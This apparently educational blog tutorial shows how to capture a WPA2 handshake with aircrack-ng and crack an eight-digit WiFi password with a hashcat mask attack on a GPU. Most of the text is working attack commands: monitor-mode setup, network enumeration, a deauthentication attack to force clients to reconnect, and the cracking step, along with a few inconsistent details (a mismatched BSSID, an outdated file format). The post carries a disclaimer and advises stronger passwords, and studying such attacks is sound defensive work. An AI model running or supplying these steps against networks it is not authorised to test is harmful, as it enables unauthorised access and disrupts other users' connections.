Disclaimer

This post is for educational purposes only and should NOT be used otherwise. The primary aim is to understand how a weak WiFi password can be compromised in a few minutes, if not less.

Introduction

In this post I will be explaining how you could easily brute force (masked) a weak WPA2 WiFi password that consists only of 8 digits (as many people do) using a local laptop with an old GPU card in a few minutes. So, probably the first thing you do after reading this (or even before reading) is to create a new password for your WiFi network with more than 8 characters, including numbers, a mix of upper & lower case and special characters.

The use of nvidia GPU here is due to the huge parallelism that can be achieved with it vs CPU, mainly due to the hundreds/thousands of CUDA cores.

Prerequisites

Software Requirements

• Linux, I’d recommend using Kali or Ubuntu, but it’s totally up to you
• Aircrack-ng to sniff the packets and record a WPA handshake
• hashcat 6 or later to brute force the password
• hashcat-utils hcxtools for converting the output to the proper format for hashcat
• CUDA toolkit 9 or later versions for utilizing the GPU cuda cores for cracking

Hardware Requirements

• A WiFi card that supports monitoring mode (promiscuous), here are some examples.
• Any nvidia card with CUDA 9 or later support

Let’s SNIFF!

Start Monitoring Mode

Kill any processes that might be controlling your WiFi card and interfere with our tasks:

airmon-ng check kill

Start actual monitoring:

airmon-ng start <YOUR_WIFI_CARD_NAME_FROM_IWCONFIG>

Monitor and list all networks around you

airodump-ng <YOUR_WIFI_MONITORING_INTERFACE> #usually wlan0mon

CH 3 ][ Elapsed: 30 s ][ 2021-05-19 04:25
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:FB:5D:00:2B:E0 -87 38 1 0 8 130 WPA2 CCMP PSK MYHome
54:39:DF:7C:83:B8 -86 39 0 0 6 130 WPA2 CCMP PSK Qtel-BB1
48:F9:B3:B7:A2:64 -80 28 1 0 8 195 WPA CCMP PSK BAMB 2
D8:48:0B:54:56:0D -84 17 0 0 11 130 WPA2 CCMP PSK Qtel-BB-2
02:26:89:70:BD:1D -84 5 0 0 6 130 WPA CCMP PSK dlink

Capturing Packets

To start capturing packets from MYHome for example:

airodump-ng -c 8 --bssid E5:FB:5D:00:2A:E0 -w MYHome.out wlan0mon #wait till a full handshake occurs between a client and the network

What to do if NO handshake occurs

If a handshake doesn’t occur after waiting for some time, you can force it in another terminal via a Deauthentication attack (but take care you are moving from passive attack to active now and you might get detected):

aireplay-ng -0 2 -a E4:FB:5D:00:2B:E0 wlan0mon

What to do if a handshake occurs

When on the top right you see a message that a handshake occured, you have to convert the cap file to a format recognized by hashcat (using hashcat-utils hcxtools which are downloaded separately):

cap2hccapx.bin MYHome.out-01.cap MYHome.hccapx # Format no longer supported in hashcat since v6.0.0, use the below instead after installing hcxtools
sudo apt install hcxtools
hcxpcapngtool MYHome.out-01.cap -o MYHome.out-01.pcap #

Let’s crack it!

hashcat.bin -m 22000 -a3 MYHome.hccapx -1 ?l?u -2 ?l?u?d ?d?d?d?d?d?d?d?d -w 3 # -w makes GPU utilization 100%, but may freeze your screen

The above is just an example for a masked attack, which is way better than the regular Brute Force one (kind of optimized brute force). Your playground is the mask (in bold in the previous command), which you can consider as an art, since you have to guess the range of the passwords. For this article, I made all the mask as digits, i.e. 8 numbers between 0 and 9.

Advanced Tip: -1 and -2 (can also use -3 and -4) are custom charsets that can be composed out of the charsets below. If you want for example to indicate that a character would be either a small or capital letter, then use -1 ?l?u and then use 1 in the mask.

This is a list that shows all the available charsets supported by hashcat as of now

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

In case of a successful crack, hashcat will exit with Status: Cracked and will show you the password.

Enjoy!

Sources

• https://hashcat.net/wiki/doku.php
• https://hashcat.net/forum
• https://www.aircrack-ng.org/
• https://resources.infosecinstitute.com/topic/hashcat-tutorial-beginners/
• https://security.stackexchange.com
• https://hackinglethani.com/the-art-of-breaking-a-hash/
• https://github.com/brannondorsey/wifi-cracking
• https://www.4armed.com/blog/perform-mask-attack-hashcat/
• https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46
• https://www.linux.org/threads/using-hashcat-to-recover-your-passwords.4560/
• Many others that I have unfortunately not kept track of!